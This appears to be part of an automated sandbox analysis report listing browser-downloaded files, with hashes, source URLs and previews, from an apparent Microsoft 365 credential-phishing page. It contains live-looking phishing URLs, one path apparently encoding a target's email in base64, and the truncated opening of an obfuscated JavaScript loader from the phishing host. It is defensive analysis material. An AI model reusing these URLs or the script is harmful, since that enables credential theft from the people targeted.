                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a2.55,2.55,0,0,1-.562.188,2.423,2.423,0,0,1-.3.07q-.141.023-.281.055V20.266q.422-.125.813-.281t.766-.344a8.253,8.253,0,0,0,1.344-.844h1.313m4.531,8.234h4.156v1.8H19.859v-.75a3.292,3.292,0,0,1,.25-1.344,4.183,4.183,0,0,1,.625-1.078,5.7,5.7,0,0,1,.844-.828q.219-.187.438-.352t.422-.32q.453-.312.766-.578a2.593,2.593,0,0,0,.3-.281l.25-.281a3.148,3.148,0,0,0,.328-.562,1.59,1.59,0,0,0,.109-.609,1.176,1.176,0,0,0-.359-.937,1.552,1.552,0,0,0-1.078-.328,3.625,3.625,0,0,0-2.422,1V19.688a4.866,4.866,0,0,1,1.359-.625,5.548,5.548,0,0,1,1.516-.2,4.456,4.456,0,0,1,1.344.188,2.461,2.461,0,0,1,1,.563,2.242,2.242,0,0,1,.625.875,3.007,3.007,0,0,1,.219,1.156,3.538,3.538,0,0,1-.055.641,3.7,3.7,0,0,1-.148.563,3.439,3.439,0,0,1-.562.953,7.2,7.2,0,0,1-.8.8q-.21
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                              Category:downloaded
                                                                              Size (bytes):673
                                                                              Entropy (8bit):7.6596900876595075
                                                                              Encrypted:false
                                                                              SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                              MD5:0E176276362B94279A4492511BFCBD98
                                                                              SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                              SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                              SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                                                              Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:SVG Scalable Vector Graphics image
                                                                              Category:dropped
                                                                              Size (bytes):1636
                                                                              Entropy (8bit):4.214613323368661
                                                                              Encrypted:false
                                                                              SSDEEP:24:t4pb8W1baAcycV1i21AL5Xr/fJzWTtDYnpTyuwa+BDhMXeDFF6+/OKgXOgWKZsHz:zdyb2+jfJz+sFyN3BdMeFF52KgeTksHz
                                                                              MD5:F7AB697E65B83CE9870A4736085DEEEC
                                                                              SHA1:5FF40BFF26B523FBBEAA5228A2AAC63E44AFAA90
                                                                              SHA-256:CBB3706E65B35A43BDCFEBD23B5479DC0542CA7E23197869B683D12B524472FE
                                                                              SHA-512:158874143CE65485348813431BB585227772F315234E08158A329DF98319AA5F1DB21DEF2AD7CAA5C25AD11660E7D4E05158CFA1198913A33B1B91676C4CA402
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a2.55,2.55,0,0,1-.562.188,2.423,2.423,0,0,1-.3.07q-.141.023-.281.055V20.266q.422-.125.813-.281t.766-.344a8.253,8.253,0,0,0,1.344-.844h1.313m4.531,8.234h4.156v1.8H19.859v-.75a3.292,3.292,0,0,1,.25-1.344,4.183,4.183,0,0,1,.625-1.078,5.7,5.7,0,0,1,.844-.828q.219-.187.438-.352t.422-.32q.453-.312.766-.578a2.593,2.593,0,0,0,.3-.281l.25-.281a3.148,3.148,0,0,0,.328-.562,1.59,1.59,0,0,0,.109-.609,1.176,1.176,0,0,0-.359-.937,1.552,1.552,0,0,0-1.078-.328,3.625,3.625,0,0,0-2.422,1V19.688a4.866,4.866,0,0,1,1.359-.625,5.548,5.548,0,0,1,1.516-.2,4.456,4.456,0,0,1,1.344.188,2.461,2.461,0,0,1,1,.563,2.242,2.242,0,0,1,.625.875,3.007,3.007,0,0,1,.219,1.156,3.538,3.538,0,0,1-.055.641,3.7,3.7,0,0,1-.148.563,3.439,3.439,0,0,1-.562.953,7.2,7.2,0,0,1-.8.8q-.21
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 513
                                                                              Category:downloaded
                                                                              Size (bytes):276
                                                                              Entropy (8bit):7.316609873335077
                                                                              Encrypted:false
                                                                              SSDEEP:6:XtqDFR4m68lkQfanvbEzXI0iP427cnLPw6/aqqmb/:XUD34sMDaXI0demb/
                                                                              MD5:4E3510919D29D18EEB6E3E8B2687D2F5
                                                                              SHA1:31522A9EC576A462C3F1FFA65C010D4EB77E9A85
                                                                              SHA-256:1707BE1284617ACC0A66A14448207214D55C3DA4AAF25854E137E138E089257E
                                                                              SHA-512:DFAD29E3CF9E51D1749961B47382A5151B1F3C98DEABF2B63742EB6B7F7743EE9B605D646A730CF3E087D4F07E43107C8A01FF5F68020C7BF933EBA370175682
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg
                                                                              Preview:...........Q=o. ..+.......=t....E.k["...../g;n.,....{.......2....*e.......J).*8..).5.....>,.ih...^s...&M.Ta..m........C.N5.G.!.-...}.9.~........u.3..@i..qK.U.......E.........S.......A.....6...G..g...,f3g.5F..I...G@<..L.:`.N&.?R....d..(.7._....z.L.......s....
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
                                                                              Category:downloaded
                                                                              Size (bytes):2407
                                                                              Entropy (8bit):7.900400471609788
                                                                              Encrypted:false
                                                                              SSDEEP:48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
                                                                              MD5:9D372E951D45A26EDE2DC8B417AAE4F8
                                                                              SHA1:84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
                                                                              SHA-256:4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
                                                                              SHA-512:78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg
                                                                              Preview:...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx|............|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:Unicode text, UTF-8 (with BOM) text
                                                                              Category:downloaded
                                                                              Size (bytes):23427
                                                                              Entropy (8bit):5.112735417225198
                                                                              Encrypted:false
                                                                              SSDEEP:384:1HHLO7eS0F4bBY/fn6jZcy9/cGK1q8CarY64Cb+dOy:1HHCLYXfl1q8CarY64Cb+dl
                                                                              MD5:BA0537E9574725096AF97C27D7E54F76
                                                                              SHA1:BD46B47D74D344F435B5805114559D45979762D5
                                                                              SHA-256:4A7611BC677873A0F87FE21727BC3A2A43F57A5DED3B10CE33A0F371A2E6030F
                                                                              SHA-512:FC43F1A6B95E1CE005A8EFCDB0D38DF8CC12189BEAC18099FD97C278D254D5DA4C24556BD06515D9D6CA495DDB630A052AEFC0BB73D6ED15DEBC0FB1E8E208E7
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://www.w3schools.com/w3css/4/w3.css
                                                                              Preview:./* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes */.html{box-sizing:border-box}*,*:before,*:after{box-sizing:inherit}./* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */.html{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}.article,aside,details,figcaption,figure,footer,header,main,menu,nav,section{display:block}summary{display:list-item}.audio,canvas,progress,video{display:inline-block}progress{vertical-align:baseline}.audio:not([controls]){display:none;height:0}[hidden],template{display:none}.a{background-color:transparent}a:active,a:hover{outline-width:0}.abbr[title]{border-bottom:none;text-decoration:underline;text-decoration:underline dotted}.b,strong{font-weight:bolder}dfn{font-style:italic}mark{background:#ff0;color:#000}.small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}.sub{bottom:-0.25em}sup{top:-0.5em}figure{margin:1em 40px}img{border-style:none}.code,kbd,p
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                              Category:downloaded
                                                                              Size (bytes):1435
                                                                              Entropy (8bit):7.8613342322590265
                                                                              Encrypted:false
                                                                              SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                              MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                              SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                              SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                              SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                                                              Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                              Category:dropped
                                                                              Size (bytes):2228
                                                                              Entropy (8bit):7.82817506159911
                                                                              Encrypted:false
                                                                              SSDEEP:48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
                                                                              MD5:EF9941290C50CD3866E2BA6B793F010D
                                                                              SHA1:4736508C795667DCEA21F8D864233031223B7832
                                                                              SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                                                              SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:gzip compressed data, from Unix, truncated
                                                                              Category:downloaded
                                                                              Size (bytes):20
                                                                              Entropy (8bit):1.2917601481809733
                                                                              Encrypted:false
                                                                              SSDEEP:3:Ftt:Xt
                                                                              MD5:7029066C27AC6F5EF18D660D5741979A
                                                                              SHA1:46C6643F07AA7F6BFE7118DE926B86DEFC5087C4
                                                                              SHA-256:59869DB34853933B239F1E2219CF7D431DA006AA919635478511FABBFC8849D2
                                                                              SHA-512:7E8E93F4A89CE7FAE011403E14A1D53544C6E6F6B6010D61129DC27937806D2B03802610D7999EAB33A4C36B0F9E001D9D76001B8354087634C1AA9C740C536F
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:http://taxigiarebienhoa.vn/nini/ybmex/captcha/Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20
                                                                              Preview:....................
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:Unicode text, UTF-8 text, with very long lines (64593)
                                                                              Category:downloaded
                                                                              Size (bytes):100217
                                                                              Entropy (8bit):4.51688839918228
                                                                              Encrypted:false
                                                                              SSDEEP:1536:ib8J+apQ3jx2wtA4+eS6e6+mitQT3TLJCLaRlAF:ix2wtA4+eS6e6+XE3TLJCLIlAF
                                                                              MD5:69858F1D6AA467818FEE39E46BFAADDB
                                                                              SHA1:7CE20EEC85C8DE3644C0367CDFCE8972BFE3C25B
                                                                              SHA-256:31F0972C467CB759E8A0C3790AF92329D9AB6F940DFA8D43AA02A609D2B5C09B
                                                                              SHA-512:101C431D95D136A1AE598660DFE4C3812DE06DD1F9D4280EC80D0A9CE5E4FF1D30F07827B91DFCE78100784C34F0AAF2F58E921304E9DB034516AD97A31AA849
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://rieg.riegriegrieg.com/n/jsnom.js
                                                                              Preview:function _0x1fae(_0x34ba19, _0x598b18) { const _0x59eb05 = _0x59eb(); return _0x1fae = function(_0x1fae59, _0x391fd5) { _0x1fae59 = _0x1fae59 - 0xea; let _0xcbc169 = _0x59eb05[_0x1fae59]; return _0xcbc169; }, _0x1fae(_0x34ba19, _0x598b18); }(function(_0x3ed08f, _0x56c8b3) {. const _0x2019c0 = _0x1fae,. _0x43cc63 = _0x3ed08f();. while (!![]) {. try {. const _0x262285 = parseInt(_0x2019c0(0x121)) / 0x1 + -parseInt(_0x2019c0(0x170)) / 0x2 + -parseInt(_0x2019c0(0x14b)) / 0x3 + -parseInt(_0x2019c0(0x14d)) / 0x4 + -parseInt(_0x2019c0(0x14c)) / 0x5 + -parseInt(_0x2019c0(0x118)) / 0x6 + parseInt(_0x2019c0(0x171)) / 0x7;. if (_0x262285 === _0x56c8b3) break;. else _0x43cc63['push'](_0x43cc63['shift']());. } catch (_0x3070ea) { _0x43cc63['push'](_0x43cc63['shift']()); }. }.}(_0x59eb, 0x27508), window['addEventListener']('load', function() {. const _0x1706f4 = _0x1fae;. document[_0x1706f4(0x166)][_0x1706f4(0x102)](_0x1706f4(0x151
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:downloaded
                                                                              Size (bytes):52
                                                                              Entropy (8bit):4.190260390968384
                                                                              Encrypted:false
                                                                              SSDEEP:3:OnuZoS+NT/ZoS8/ZYn:OnuZoSyT/ZoS8/ZYn
                                                                              MD5:09BDE5D10D92DEBBB74AE9C3DF3AECAB
                                                                              SHA1:2F4EEA05E85C26DE82C5E7CBA471687EC8D855EC
                                                                              SHA-256:F67F67274C88240DE01FA51D483271F58A5752B607B13DEE041C7A0671290E7F
                                                                              SHA-512:0FF4A460BC9068E61B6EEC0078E97F2AD0DCD12288E8161688351C3BB85A87D624E5B7635C47ED1B5B93C6D3B4A29A756A75A897394B4E6A3986BBB1762CFC6C
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISJQnbWIo8G63gSRIFDZFhlU4SBQ01hlQcEgUNkWGVThIFDZFhlU4=?alt=proto
                                                                              Preview:CiQKBw2RYZVOGgAKBw01hlQcGgAKBw2RYZVOGgAKBw2RYZVOGgA=
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (49854)
                                                                              Category:downloaded
                                                                              Size (bytes):49993
                                                                              Entropy (8bit):5.216475744251136
                                                                              Encrypted:false
                                                                              SSDEEP:768:RKrClF4PgzcEZ5G/Z4G9qXLZed86mhrjlm:RPXcZ4TLZzpPm
                                                                              MD5:777EB8FD4F8320B6E5CC9A7159BDEC6A
                                                                              SHA1:6B4032E88D0040182089FE3BEFDECEE9346E8921
                                                                              SHA-256:73EBA16BC895FDFA454E27ECB80DEF31EDE8D861F99E175FF93B110EABEC044F
                                                                              SHA-512:D75B7C43EBD8F49942AEBF8FBDE64A4D826AF27ECED3D6395FFA64FDA31DDEF26E812BEEE313AE9C6114CDA003A8BDC8F1C64A13FA41C3009F5F30E4449876B1
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://cdn.socket.io/4.7.5/socket.io.min.js
                                                                              Preview:/*!. * Socket.IO v4.7.5. * (c) 2014-2024 Guillermo Rauch. * Released under the MIT License.. */.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).io=t()}(this,(function(){"use strict";function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e(t)}function t(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function n(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,(i=r.key,o=void 0,"symbol"==typeof(o=function(e,t){if("object"!=typeof e||null===e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var r=n.call(e,t||"default");if("object"!=typeof r)return r;th
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 250
                                                                              Category:downloaded
                                                                              Size (bytes):199
                                                                              Entropy (8bit):6.766983163126765
                                                                              Encrypted:false
                                                                              SSDEEP:6:XtkhhsKHWpSiKPjPOeNWo6Rs7J1TxODwpV:X8hsKHDTPyeNSRs7vV0aV
                                                                              MD5:21B761F2B1FD37F587D7222023B09276
                                                                              SHA1:F7A416C8907424F9A9644753E3A93D4D63AE640E
                                                                              SHA-256:72D4161C18A46D85C5566273567F791976431EFEF49510A0E3DD76FEC92D9393
                                                                              SHA-512:77745F60804D421B34DE26F8A216CEE27C440E469FD786A642757CCEDBC4875D5196431897D80137BD3E20B01104BA76DEC7D8E75771D8A9B5F14B66F2A9B7C0
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg
                                                                              Preview:..........u....0.._%2k.8?....w..k..!.M.."b5<.M.bD..c..l.:..}...@.8p.sn.j...%".B...J..6...c..^..?...2d...R..w.<%..}..}s..ir0/.......:8).(.......^u...0..U..I.F....{]...[-......~..F.P_.....G.....
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                              Category:downloaded
                                                                              Size (bytes):2228
                                                                              Entropy (8bit):7.82817506159911
                                                                              Encrypted:false
                                                                              SSDEEP:48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
                                                                              MD5:EF9941290C50CD3866E2BA6B793F010D
                                                                              SHA1:4736508C795667DCEA21F8D864233031223B7832
                                                                              SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                                                              SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://www.gstatic.com/recaptcha/api2/logo_48.png
                                                                              Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):41
                                                                              Entropy (8bit):4.180365114215879
                                                                              Encrypted:false
                                                                              SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
                                                                              MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
                                                                              SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
                                                                              SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
                                                                              SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:{"code":1,"message":"Session ID unknown"}
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:Unicode text, UTF-8 text, with very long lines (64593)
                                                                              Category:dropped
                                                                              Size (bytes):100217
                                                                              Entropy (8bit):4.51688839918228
                                                                              Encrypted:false
                                                                              SSDEEP:1536:ib8J+apQ3jx2wtA4+eS6e6+mitQT3TLJCLaRlAF:ix2wtA4+eS6e6+XE3TLJCLIlAF
                                                                              MD5:69858F1D6AA467818FEE39E46BFAADDB
                                                                              SHA1:7CE20EEC85C8DE3644C0367CDFCE8972BFE3C25B
                                                                              SHA-256:31F0972C467CB759E8A0C3790AF92329D9AB6F940DFA8D43AA02A609D2B5C09B
                                                                              SHA-512:101C431D95D136A1AE598660DFE4C3812DE06DD1F9D4280EC80D0A9CE5E4FF1D30F07827B91DFCE78100784C34F0AAF2F58E921304E9DB034516AD97A31AA849
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:function _0x1fae(_0x34ba19, _0x598b18) { const _0x59eb05 = _0x59eb(); return _0x1fae = function(_0x1fae59, _0x391fd5) { _0x1fae59 = _0x1fae59 - 0xea; let _0xcbc169 = _0x59eb05[_0x1fae59]; return _0xcbc169; }, _0x1fae(_0x34ba19, _0x598b18); }(function(_0x3ed08f, _0x56c8b3) {. const _0x2019c0 = _0x1fae,. _0x43cc63 = _0x3ed08f();. while (!![]) {. try {. const _0x262285 = parseInt(_0x2019c0(0x121)) / 0x1 + -parseInt(_0x2019c0(0x170)) / 0x2 + -parseInt(_0x2019c0(0x14b)) / 0x3 + -parseInt(_0x2019c0(0x14d)) / 0x4 + -parseInt(_0x2019c0(0x14c)) / 0x5 + -parseInt(_0x2019c0(0x118)) / 0x6 + parseInt(_0x2019c0(0x171)) / 0x7;. if (_0x262285 === _0x56c8b3) break;. else _0x43cc63['push'](_0x43cc63['shift']());. } catch (_0x3070ea) { _0x43cc63['push'](_0x43cc63['shift']()); }. }.}(_0x59eb, 0x27508), window['addEventListener']('load', function() {. const _0x1706f4 = _0x1fae;. document[_0x1706f4(0x166)][_0x1706f4(0x102)](_0x1706f4(0x151
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:HTML document, ASCII text
                                                                              Category:downloaded
                                                                              Size (bytes):366
                                                                              Entropy (8bit):5.610435206244597
                                                                              Encrypted:false
                                                                              SSDEEP:6:5mWxuJGzxOn3zuqBCiwAGfOVZA+WLShJTIP5TNm5dSUmxDeY4NhdA1BYXXfbwY4O:4WYcVa3zuqBCDAWOvfWLSsPZ45dWDd43
                                                                              MD5:4B4A496070376D2459ADEF6701672A62
                                                                              SHA1:5779DF95E02EDEC00D418B1A1645776C73B1E0CC
                                                                              SHA-256:58EDA89F3B3C8CD986E43A707F5ED602A3C63451963667AF1C768DB3683B3EE3
                                                                              SHA-512:D663A518917B91CBDFDE8A7900E490853911787421E0B96D569064F867D82E36A70898B82E1854539C68ED3CBF08844002BF1A22740C3D3A493DFBFCABA2C43F
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://rieg.riegriegrieg.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZFMW5halE9JnVpZD1VU0VSMDkxMDIwMjRVNDQxMDA5MjE=N0123N
